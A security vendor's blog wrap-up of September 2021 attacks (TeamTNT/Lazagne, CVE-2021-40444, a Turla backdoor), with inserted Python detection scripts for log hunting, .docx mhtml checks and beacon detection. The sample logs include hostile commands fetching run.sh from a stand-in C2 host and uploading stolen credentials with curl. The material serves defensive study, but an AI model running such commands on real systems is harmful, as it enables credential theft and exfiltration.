Cymulate’s September 2021 Cyberattacks Wrap-up

By: Eyal Aharoni, October 4, 2021

Threat actors stepped up their game during September 2021. For starters, the Nobelium threat actor group launched its FoggyWeb malware, designed to exfiltrate credentials and introduce a permanent backdoor into Active Directory servers. Threat actors also launched the TangleBot malware to gain access for spying, data-harvesting, stalking, and fraud attacks, and upped their phishing game with deep-sea phishing, which combines phishing, spear-phishing, and whaling to launch more aggressive attack campaigns. Ransomware, such as Ryuk, and worm-like capabilities were used in the campaigns to make them more effective.

 

TeamTNT and Lazagne Threat

During September, the threat group TeamTNT was active again, this time targeting multiple operating systems and applications. Operating since the middle of 2020, TeamTNT has been responsible for thousands of infections globally. The group’s trademark is the use of open-source tools such as Masscan and a port scanner to detect new infection targets, libprocesshider to execute its bot directly from memory, 7z to decompress downloaded files, b374k shell to control infected systems, and Lazagne to collect stored credentials from numerous applications. This time, TeamTNT used multiple shell/batch scripts, new open-source tools, a cryptocurrency miner, and its TeamTNT IRC bot for its attack campaign. The new open-source tools were designed to steal usernames and passwords from the infected machines. The threat actors targeted operating systems such as Windows and Linux distributions including Alpine, as well as AWS, Docker, and Kubernetes. The attacks, dubbed the Chimaera campaign, had low to zero detection.

  • The Lazagne credentials stealer first modified the bash history file so that commands executed afterwards were hidden from users running the “history” command on Linux.
  • It then installed ‘curl’, ‘bash’, ‘wget’, ‘pip’, ‘py3-pip’, and ‘python3-pip’ to launch the malware.
  • The malware then downloaded another bash script (‘run.sh’) from its C&C, along with the open-source Lazagne project, which is available for different operating systems such as Windows, Linux, and macOS.
  • This second malicious script executed the Lazagne tool and saved its output into “laZagne.out.txt”.
  • It then uploaded that file to the C&C using the curl command.
  • After it finished this execution, the malware deleted all its downloaded files.
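
The chain above can be hunted for in shell-command audit logs. The following is an added example, not part of the original post or of Cymulate's tooling: it tags each logged command with the stage it resembles and reports hosts showing most of the chain. The log line format, the host names, the `example.invalid` addresses and the concrete command forms for history tampering and package installation are assumptions.

```python
import re
from collections import defaultdict

# Stage patterns in the order of the bullets above. The page names the
# behaviour, the packages, 'run.sh' and 'laZagne.out.txt'; the concrete
# command forms (HISTFILE handling, package managers) are assumptions.
STAGES = [(name, re.compile(rx)) for name, rx in [
    ("history_tamper", r"unset\s+HISTFILE|HISTFILE=/dev/null|HISTSIZE=0|history\s+-c"),
    ("tool_install", r"\b(apt-get|apt|yum|apk)\s+(install|add)\b.*\b(curl|wget|pip)\b"),
    ("fetch_run_sh", r"\b(curl|wget)\b.*\brun\.sh\b"),
    ("lazagne_output", r">\s*\S*laZagne\.out\.txt"),
    ("upload_output", r"\bcurl\b.*laZagne\.out\.txt"),
    ("cleanup", r"\brm\b.*(run\.sh|laZagne)"),
]]
# Assumed audit-log format: "<timestamp> host=<name> cmd=<command line>"
LINE = re.compile(r"^(?P<ts>\S+) host=(?P<host>\S+) cmd=(?P<cmd>.*)$")

def stages_by_host(lines):
    """Map host -> chain stages seen on it, in first-seen order."""
    seen = defaultdict(list)
    for line in lines:
        m = LINE.match(line.strip())
        if not m:
            continue  # not in the assumed format
        for name, rx in STAGES:
            if rx.search(m["cmd"]) and name not in seen[m["host"]]:
                seen[m["host"]].append(name)
    return dict(seen)

def suspicious_hosts(lines, min_stages=4):
    """Hosts with at least min_stages distinct stages; one stage alone
    (for example a routine package install) is not reported."""
    return sorted(h for h, s in stages_by_host(lines).items() if len(s) >= min_stages)

# Constructed sample log lines (not real telemetry).
SAMPLE = """\
2021-09-14T10:00:01Z host=build01 cmd=apt-get install -y curl
2021-09-14T10:02:10Z host=web01 cmd=unset HISTFILE
2021-09-14T10:02:11Z host=web01 cmd=apk add curl bash wget py3-pip
2021-09-14T10:02:15Z host=web01 cmd=wget -q http://c2.example.invalid/run.sh -O /tmp/run.sh
2021-09-14T10:02:20Z host=web01 cmd=python3 /tmp/laZagne.py all > /tmp/laZagne.out.txt
2021-09-14T10:02:25Z host=web01 cmd=curl -F file=@/tmp/laZagne.out.txt http://c2.example.invalid/up
2021-09-14T10:02:30Z host=web01 cmd=rm -f /tmp/run.sh /tmp/laZagne.py /tmp/laZagne.out.txt
""".splitlines()

if __name__ == "__main__":
    print(suspicious_hosts(SAMPLE))
```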

 

Office and Windows Exploit Continues

This month, the Windows CVE-2021-40444 zero-day vulnerability still posed a danger despite Microsoft Office's 'Protected View' feature, which blocks the exploit. The vulnerability enabled threat actors to take over corporate networks by using malicious ActiveX controls to exploit Office 365 and Office 2019 on Windows 10 for downloading and installing malware on the compromised machines. Although the 'Protected View' feature mitigated the exploit, many users tended to ignore this warning and clicked on the 'Enable Editing' button. Furthermore, if a document was delivered in a container that was not MotW-aware (Mark of the Web), there was no Protected View to block arbitrary code execution when the Office document was opened. RTF files do not have Protected View, which makes them especially vulnerable. This vulnerability was abused by threat actors using phishing attacks.

  1. An email was sent claiming to be from an attorney, carrying the file “Letter before court 4.docx”.
  2. The file was tagged with the 'Mark of the Web' and opened in Protected View.
  3. Once the 'Enable Editing' button was clicked, the exploit opened a URL using the 'mhtml' protocol.
  4. A 'side.html' file hosted at a remote site loaded as a Word template.
  5. A malicious ActiveX control was created by the obfuscated JavaScript code to exploit the CVE-2021-40444 vulnerability.
  6. The ActiveX control also downloaded a ministry.cab file from a remote site and extracted a championship.inf [DLL] file.
  7. The file was then executed as a Control Panel 'CPL' file.
  8. The ultimate payload installed a Cobalt Strike beacon for the threat actors to gain remote access to the infected machine.
  9. The infection then spread laterally throughout the network, installing more malware.
  10. The threat actors were then able to steal files or deploy ransomware.
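
Step 3 depends on the document pointing at a remote URL through the 'mhtml' protocol, which a mail gateway or triage script can check before anyone opens the file. The following is an added example, not code from the original post: it lists every external relationship in a .docx container and flags those whose target starts with `mhtml:`, whatever the relationship type. The sample container, the `remote.example.invalid` host and the size cap are constructed assumptions.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
MAX_RELS_BYTES = 1_000_000  # assumed cap; .rels parts are normally a few KB

def external_targets(docx_bytes):
    """Return (part, relationship type, target) for each external relationship."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for info in z.infolist():
            if not info.filename.endswith(".rels"):
                continue
            data = z.read(info) if info.file_size <= MAX_RELS_BYTES else b""
            # Oversized parts and parts carrying a DTD are not parsed; they are
            # reported as "unparsed" so they get reviewed instead of skipped.
            if not data or b"<!DOCTYPE" in data or b"<!ENTITY" in data:
                found.append((info.filename, "unparsed", ""))
                continue
            for rel in ET.fromstring(data).iter(REL_NS + "Relationship"):
                if rel.get("TargetMode", "").lower() == "external":
                    kind = rel.get("Type", "").rsplit("/", 1)[-1]
                    found.append((info.filename, kind, rel.get("Target", "")))
    return found

def mhtml_targets(docx_bytes):
    """External relationships whose target uses the 'mhtml' scheme named above."""
    return [t for t in external_targets(docx_bytes)
            if t[2].strip().lower().startswith("mhtml:")]

def build_sample():
    """Constructed .docx-like container: one benign link, one mhtml: target."""
    rels = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        f'<Relationship Id="rId1" Type="{OFFICE_REL}hyperlink" '
        'Target="https://www.example.com/" TargetMode="External"/>'
        f'<Relationship Id="rId2" Type="{OFFICE_REL}attachedTemplate" '
        'Target="mhtml:http://remote.example.invalid/side.html" TargetMode="External"/>'
        '</Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("word/_rels/settings.xml.rels", rels)
    return buf.getvalue()
```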

 

Turla APT's New Malware

Also in September, the Turla APT group stepped up its game with new malware to keep a secret backdoor on victim machines. The Russian-based Turla group has been active for almost two decades and has compromised organizations in over 45 countries in a wide range of sectors, including government, embassies, military, education, research, and pharmaceuticals. This backdoor was used as a second-chance backdoor to maintain access to the compromised system and as a second-stage dropper to infect the system with additional malware.

  • Turla APT installed the Backdoor-as-a-Service on the infected machines.
  • It then used a .bat file to install the backdoor, which was named "Windows Time Service" to resemble a legitimate Windows service.
  • The backdoor uploaded and executed files on, and exfiltrated files from, the compromised systems.
  • The malware contacted the C&C server via an HTTPS encrypted channel every five seconds to check if there were new commands from the operator.
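
A fixed check-in interval like the five seconds described above stays visible in proxy or flow logs even when the channel is HTTPS. The following is an added example, not part of the original post: it groups connections by source and destination and reports pairs whose inter-arrival times are near-constant, so it covers any regular period and not only five seconds. The event tuples, addresses and thresholds are constructed assumptions.

```python
import statistics
from collections import defaultdict

def beacon_candidates(events, min_events=20, max_jitter=0.1):
    """events: iterable of (epoch_seconds, src, dst).
    Returns {(src, dst): median_period_seconds} for pairs whose gaps between
    connections are near-constant."""
    times = defaultdict(list)
    for ts, src, dst in events:
        times[(src, dst)].append(float(ts))
    hits = {}
    for pair, ts in times.items():
        if len(ts) < min_events:
            continue  # too few connections to call anything periodic
        ts.sort()
        gaps = [b - a for a, b in zip(ts, ts[1:])]
        period = statistics.median(gaps)
        if period <= 0:
            continue
        # Median absolute deviation: a few missed or delayed check-ins do not
        # hide the beacon, unlike a plain standard deviation.
        mad = statistics.median(abs(g - period) for g in gaps)
        if mad / period <= max_jitter:
            hits[pair] = round(period, 2)
    return hits

def build_sample():
    """Constructed events: a 5-second beacon with small jitter and one missed
    check-in, plus irregular browsing from another workstation."""
    jitter = [0.0, 0.1, 0.1, -0.1, -0.1, 0.0]
    beacon = [(1000 + 5 * i + jitter[i % 6], "10.0.0.5", "c2.example.invalid")
              for i in range(40) if i != 17]
    t, browse = 1000.0, []
    for gap in [1, 2, 40, 3, 120, 7, 1, 300, 15, 2] * 3:
        t += gap
        browse.append((t, "10.0.0.7", "www.example.com"))
    return beacon + browse

if __name__ == "__main__":
    print(beacon_candidates(build_sample()))
```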

--

To find out if your organization is protected against the latest malware attacks, run Cymulate's Immediate Threat Assessment. This allows you to test and verify for yourself whether your organization is exposed to these attacks. It also offers suggestions for mitigations in case it turns out that your organization is indeed vulnerable. IOCs are also available in the Cymulate UI!

Stay cybersafe!

Eyal Aharoni

Eyal is the VP of Customer Success at Cymulate. During the last 15 years, Eyal has performed a number of critical roles in the information and cyber security fields, providing services for global organizations in a wide range of sectors.